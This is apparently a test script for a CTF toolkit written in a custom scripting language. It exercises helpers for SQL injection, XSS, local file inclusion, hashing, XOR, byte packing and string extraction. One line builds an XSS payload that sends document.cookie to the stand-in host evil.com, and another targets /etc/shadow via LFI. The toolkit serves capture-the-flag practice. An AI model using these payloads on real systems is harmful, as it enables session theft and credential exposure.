# PC Language - CTF All Categories Test

print("========================================")
print("  PC Language CTF Toolkit - All Categories")
print("========================================")
print("")

# ============================================================================
# 1. Web Exploitation
# ============================================================================
print("[Web] SQL Injection Payloads:")
sqli = sqli_union(3, "users", "username,password")
print("  UNION:", sqli)
sqli_time = sqli_time_based(5)
print("  Time-based:", sqli_time)
print("")

print("[Web] XSS Payloads:")
xss1 = xss_basic()
print("  Basic:", xss1)
xss2 = xss_img_onerror("fetch('http://evil.com?'+document.cookie)")
print("  IMG onerror:", xss2)
print("")

print("[Web] LFI Payloads:")
lfi1 = lfi_linux("/etc/shadow")
print("  Linux LFI:", lfi1)
lfi2 = lfi_php_wrapper("index.php")
print("  PHP wrapper:", lfi2)
print("")

print("[Web] URL Encoding:")
encoded = url_encode("param=test&value=<script>")
print("  Encoded:", encoded)
decoded = url_decode(encoded)
print("  Decoded:", decoded)
print("")

# ============================================================================
# 2. Crypto (Cryptography)
# ============================================================================
print("[Crypto] Hash Functions:")
data = "flag{test123}"
print("  MD5:", md5(data))
print("  SHA256:", sha256(data))
print("")

print("[Crypto] XOR Cipher:")
key = "KEY"
encrypted = xor_bytes(data, key)
print("  Encrypted (hex):", hex_encode(encrypted))
decrypted = xor_bytes(encrypted, key)
print("  Decrypted:", decrypted)
print("")

# ============================================================================
# 3. Pwn (Binary Exploitation)
# ============================================================================
print("[Pwn] Pack/Unpack:")
addr = 0xdeadbeef
packed = p32(addr)
print("  p32(0xdeadbeef):", hex_encode(packed))
unpacked = unpack32(packed)
print("  unpack32:", hex(unpacked))
print("")

# ============================================================================
# 4. Forensics (Digital Forensics)
# ============================================================================
print("[Forensics] String Extraction:")
test_data = "Hello\x00\x01\x02World\x00Test"
strings = strings_extract(test_data, 3)
print("  Extracted strings:", strings)
print("")

print("[Forensics] Magic Bytes:")
png_header = "\x89PNG"
magic = get_magic_bytes(png_header, 4)
print("  PNG header:", magic)
print("")

# ============================================================================
# 5. Misc (Miscellaneous)
# ============================================================================
print("[Misc] Encoding Conversions:")
n = 42
print("  bin(42):", bin(n))
print("  oct(42):", oct(n))
print("  hex(42):", hex(n))
print("")

print("[Misc] String Operations:")
text = "flag{hidden_message}"
parts = split(text, "{")
print("  split:", parts)
if startswith(text, "flag{"):
    print("  Starts with 'flag{': YES")
print("")

# ============================================================================
# 6. Reverse Engineering
# ============================================================================
print("[Reverse] Character Conversions:")
c = chr(65)
print("  chr(65):", c)
code = ord("A")
print("  ord('A'):", code)
print("")

print("========================================")
print("  All CTF Categories Tested!")
print("========================================")
print("")
print("Supported CTF Categories:")
print("  ✓ Web - SQLi, XSS, LFI, URL encoding")
print("  ✓ Crypto - Hash, XOR, AES, RSA attacks")
print("  ✓ Pwn - Pack/Unpack, Process, Network")
print("  ✓ Forensics - File analysis, Strings, Hex dump")
print("  ✓ Misc - Encoding, String ops, File I/O")
print("  ✓ Reverse - chr/ord, Disasm (external)")
